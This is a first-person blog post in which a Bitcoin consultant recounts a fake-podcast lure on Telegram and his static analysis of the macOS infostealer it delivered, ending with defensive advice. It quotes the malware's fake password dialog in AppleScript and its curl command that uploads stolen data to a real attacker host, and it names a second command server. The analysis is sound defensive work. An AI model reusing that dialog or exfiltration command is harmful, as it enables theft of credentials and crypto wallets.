If you work in Bitcoin or crypto, you need to read this.
I'm Ben de Waal, CTO at Musqet and an independent Bitcoin technology consultant. A few days ago, someone tried very hard to get me to install malware on my Mac. The social engineering was polished, the fake platform was convincing, and the malware itself was designed to steal everything — browser passwords, crypto wallets, Telegram sessions, Apple Notes, Keychain data, and more.
I didn't run it. Instead, I reverse-engineered it. Here's the full breakdown so you know what to watch for.
It started with a Telegram message from someone calling himself "Alex Knitowski," claiming to be the Director of Web3 Project Management at Capital One.
The profile looked legitimate at first glance — real name, professional bio, profile photo. He said he wanted me to appear on a podcast to discuss Bitcoin technology and had clearly done his homework. He had a prepared list of questions that were relevant to my actual work. This wasn't a lazy spray-and-pray attack. Someone had researched me.
He directed me to a platform called "jandi.social" to join the recording session. The site looked like a professional conferencing tool, complete with a waiting room full of other "participants."
Notice the details: the meeting is titled "Capital One x Ben de Waal," there are multiple participants with photos and names already waiting, and the interface claims to be "end-to-end encrypted and secure." It all looks real.
Then comes the trap.
When you try to join the call, a message pops up telling you the video conference "is only available in the desktop version." You're prompted to download their client application.
This is the moment the attack pivots from social engineering to malware delivery.
At this point, my instincts kicked in. A legitimate conferencing platform runs in the browser — Zoom, Google Meet, Teams, they all do. Requiring a dedicated desktop app download to join a call is unusual and suspicious.
I asked "Alex" to verify his identity by sending me an email from a Capital One email address. He avoided the request. That confirmed it. When he realised I wasn't going to run the software, he deleted our entire chat history — a classic move to cover tracks.
But I'd already downloaded the installer (without running it) because I wanted to know exactly what it would have done to my machine.
The download is a macOS disk image (DMG) containing an app called "JandiInstaller." When you open it, you're greeted with a polished installer screen featuring Apple's "Certified Developer" branding.
Look carefully at the setup instructions at the bottom. They're telling you to go into System Settings, navigate to Privacy & Security, and click "Open Anyway" — in other words, they're walking you through bypassing macOS Gatekeeper, the security feature specifically designed to prevent unsigned/malicious apps from running.
Any legitimate software would never ask you to do this.
Using static analysis in a sandboxed environment, I was able to fully reverse-engineer this malware without ever executing it. Here's what I found.
The app is a compiled Mach-O binary (supporting both Intel and Apple Silicon Macs) that contains a 23,000-character AppleScript payload encrypted inside it. When you launch the app, it decrypts this script and executes it silently.
Here's what that script does, step by step:
The very first thing the malware does is pop up a fake system dialog asking for your device password:
display dialog "Required Application Helper. Please enter device password
to continue." default answer "" with icon imagePath buttons {"Continue"}
default button "Continue" with title "Application wants to install Jandi"
with hidden answerIt uses the real macOS lock icon to look legitimate, and it loops until you enter the correct password — it validates what you type against your actual account. Once it has your password, the rest of the attack escalates dramatically because it can now run commands with admin privileges.
The malware targets 12 different Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera, Arc, and more) plus Firefox and Waterfox. For each one, it steals cookies, saved login credentials, and web form data.
This is where the attack gets truly aggressive. The malware contains a hardcoded list of nearly 500 browser extension IDs — covering virtually every crypto wallet extension in existence: MetaMask, Phantom, Rabby, and hundreds more. It copies their local storage and database files, which can contain private keys, seed phrases, and session data.
The script specifically targets the wallet data directories of:
For anyone in the Bitcoin space, this list should be alarming. These are the wallets most commonly used by serious holders.
Using the password you entered in step 1, the malware copies your login.keychain-db — the macOS Keychain database containing every password, certificate, and secure note stored on your Mac.
The malware scans your Desktop and Documents folders for files with specific extensions — .wallet, .key, .keys, .seed, .kdbx (KeePass databases), .pdf, .doc, .txt, and image files — collecting up to 10MB of them.
It copies your entire Apple Notes database (where many people keep sensitive information) and your Telegram session files — enough to clone your Telegram account onto another device.
All of this stolen data gets zipped up and uploaded to the attacker's server:
curl -X POST -H "buildid: 2befc333db944c2c96364e97e7d97a7c"
-H "username: ..." --data-binary @/tmp/xdivcmp.zip
http://something0x.at/logIf the upload fails, it retries up to 10 times over the next 10 minutes.
This is the part that elevates this from "data theft" to "ongoing compromise." If the malware obtained your password, it contacts a second server at 192.253.248.181, downloads a LaunchDaemon configuration, and installs it with root privileges. This means:
Your Mac is now part of a botnet.
This attack pattern — fake podcast invitations targeting people in crypto, macOS-specific AppleScript infostealers, massive wallet extension lists — is consistent with campaigns attributed to both North Korean state-sponsored groups (Lazarus/APT38) and organized Eastern European cybercrime operations. These groups have stolen billions from the crypto industry using exactly this playbook.
The specific technical indicators from this sample (the C2 infrastructure, build IDs, and stealer architecture) place it in the same family as known macOS stealers like Atomic Stealer (AMOS), MacSync Stealer, and Odyssey Stealer.
If someone invites you to a podcast or interview:
If you're a macOS user:
If you hold crypto:
If you think you may have already run something like this:
/Library/LaunchDaemons/ for any plists you don't recognise.The level of effort in this attack is striking. Someone researched my background, prepared relevant interview questions, built a convincing fake conferencing platform with fake participants, created a polished macOS installer with Apple branding, and wrote a comprehensive stealer that targets every conceivable source of value on a Mac.
This isn't amateur hour. These are professional operations, and they're targeting people in the Bitcoin and crypto space specifically because that's where the money is.
Stay paranoid. Verify everything. And if something feels off — trust that instinct.
Ben de Waal is the CTO of Musqet and an independent Bitcoin technology consultant. The reverse engineering analysis described in this article was performed using static analysis in a sandboxed environment — the malware was never executed.